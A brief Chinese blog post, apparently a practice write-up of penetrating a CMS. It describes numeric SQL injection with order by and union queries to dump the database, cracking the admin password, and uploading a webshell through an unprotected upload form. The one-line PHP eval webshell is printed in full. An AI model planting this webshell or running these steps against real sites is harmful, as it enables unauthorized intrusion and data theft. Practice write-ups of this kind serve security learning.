周杰伦 8/19/2024, 2:00:17 PM
文章分类 Web安全 阅读数 : 85 阅读时长 : 1分钟
【WEB安全-记一次cms的web渗透测试练习】此文章归类为:WEB安全。
点击文章发现 尝试进行sql注入 得到漏洞为数字型通过order by语句得到字段总数为15 通过union联合查询得到显示的字段编号 将database()带入得到数据库名为cms 接下来就是查表名、字段名、具体数据 发现密码经过加密,尝试解密 通过解密得知admin账户的密码为123456登陆后台 文件管理界面存在文件上传漏洞,尝试上传webshell
<?php @
eval
($_POST[
777
])?>
未做任何防护,上传成功!用蚁剑连接webshell 连接成功!
更多【WEB安全-记一次cms的web渗透测试练习】相关视频教程:www.yxfzedu.com